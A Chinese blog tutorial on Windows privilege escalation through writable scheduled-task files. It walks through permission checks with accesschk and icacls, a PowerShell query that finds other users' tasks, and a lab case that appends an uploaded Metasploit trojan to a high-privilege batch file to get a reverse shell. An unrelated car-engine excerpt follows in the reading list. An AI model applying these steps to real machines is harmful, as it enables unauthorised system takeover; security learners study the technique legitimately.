计划任务提权
最编程
2024-10-14 06:59:02
...
原理
如果攻击者对以高权限运行的计划任务所在目录具有所写权限,就可以使用恶意程序覆盖原来的程序,这样,在计划任务下次执行时就会以高权限来运行恶意程序。
工具
Accesschk
检查某个目录及其子目录中被拒绝的权限
accesschk64.exe -dqv "/PATH"
检查特定用户在某个路径(文件或目录)上的写权限
accesschk.exe /accepteula -quvw USER PATH
Icacls
检查权限
icacls "PATH"
命令
查找系统中当前用户未创建的非 Microsoft 系统自带的计划任务
Get-ScheduledTask | Select * | ? {($_.TaskPath -notlike "\Microsoft\Windows\*") -And ($_.Principal.UserId -notlike "*$env:UserName*")} | Format-Table -Property State, Actions, Date, TaskPath, TaskName, @{Name="User";Expression={$_.Principal.userID}}
总体作用:
-
排除 Microsoft 自带的任务,只显示非 Microsoft 目录中的计划任务。
-
排除当前用户创建的任务,重点查找其他用户创建的计划任务。
-
输出这些任务的状态、动作、日期、路径、任务名称以及运行任务的用户信息。
案例
查看当前权限
whoami
net user coffee
在E盘发现高权限文件(主要是可写)
dir /a
icacls .\test.bat
C:\Users\coffee\Downloads\accesschk64.exe /accepteula -quvw coffee E:\test.bat
type E:\test.bat
将生成的木马写进去
# MSF模块
uplaod /opt/shell.exe
type E:\shell.exe >> E:\test.bat
等待一段时间,反弹成功
推荐阅读
-
计划任务提权
-
如何仅修改黑曜石图像链接以用于降权
-
Linux 计划任务
-
一年非科班自学经验分享,给学弟学妹提些建议,不要盲目进取
-
带权图上的三个问题--最短路问题、中国邮递员问题与货郎担问题
-
WebSocket项目笔记(一):鉴权、安全与心跳机制
-
Tabby漏洞:Tomcat、cURL和LXD的用户组提权问题
-
使用MSFVenom工具创建EXE后门木马并获取控制权
-
理解编程范式与控制权交接的关联
-
汽车后面的字母是什么意思?-增压发动机 类型一:TSI 大众的TSI在国内外有着不一样的意思,国外的意思是Twincharger Stratified ion,指双增压(涡轮和机械增压)分层喷射技术。而国内的意思,T代表涡轮增压,Si代表燃油直喷,而不是T与FSI的简称,并没有燃油分层喷射技术,因为国内燃油质量一般,达不到分层喷射的要求。 在国内,我们经常会看到不同的TSI标志。有全红的、有就“SI”是红的、还有只有“I”是红的。但大家别误会他们技术不一样,这只是为了区分不同的排量而已。例如:2.0排量和1.8排量为“SI”是红色的,而2.0TSI车型中的高配车型或者高端车型则使用全红的标识,那么1.4排量的当然只能是只有“I”是红色的了。 类型二:TFSI TFSI发动机也是涡轮燃油直喷发动机它可以说是FSI发动机和涡轮增压器的结合。即涡轮增压(Turbocharger)+FSI。它的T和TSI中的T一样,表示采用涡轮增压技术,后面的FSI即燃油分层喷射发动机(Fuel Stratified ion),S表示“分层次的”。TFSI发动机既分层喷射,又有涡轮增压,是TSI发动机的升级版。 类型三:TDI TDI是英文Turbo Direct ion的缩写,意为涡轮增压直接喷射柴油发动机。 为了解决SDI(自然吸气式柴油发动机)的先天不足,人们在柴油机上加装了涡轮增压装置,使得进气压力大大增加,压缩比一般都到10以上,这样就可以在转速很低的情况下达到很大的扭矩,而且由于燃烧更加充分,排放物中的有害颗粒含量也大大降低。TDI技术使燃油经由一个高压喷射器直接喷射入气缸,因为活塞顶地造型是一个凹陷式的碗状设计,燃油会在气缸内形成一股螺旋状的混合气。 自然吸气发动机类型一:CGI/CDI 发动机CGI技术是一种奔驰公司开发的缸内直喷技术。供油动作已完全独立于进门与活塞系统之外,ECU也因而拥有更多的主导权。超乎传统喷射理论的稀薄燃烧与更多元的混合比便得以实现。在稳定行进或低负载状态下,采用缸内直喷设计的发动机得以进入Ultra lean(精实)模式。 在此设定下,发动机于进气行程时只能吸进空气,至于喷油嘴则在压缩行程才供给燃料,以达到节约的效果。根据实际测试,其最高能达到1:65的油、气比例,除了节能表现相当惊人,整体动力曲线也能够维持相当高的平顺度。而CDI则为该技术的柴油版本。类型二:VVT/CVVT/VVT-I/MIVEC/VTEC/i-VTEC 发动机可变气门正时技术(VVT,Variable Valve Timing)原理是根据发动机的运行情况,调整进气(排气)的量,和气门开合时间、角度,使进入的空气量达到最佳,提高燃烧效率。优点是省油,功升比大而缺点是中段转速扭矩不足。 目前本田的VTEC、i-VTEC、;丰田的VVT-i;日产的CVVT;三菱的MIVEC;铃木的VVT;现代的VVT;起亚的CVVT;江淮的VVT;长城的VVT等也逐渐开始使用。总的说来其实就是一种技术,名字不同。 但部分车型仅具有可变气门技术而没有正时技术,虽然比一般发动机要省油,但依然赶不上带正时技术的发动机。绿色发动机 类型一:Hybrid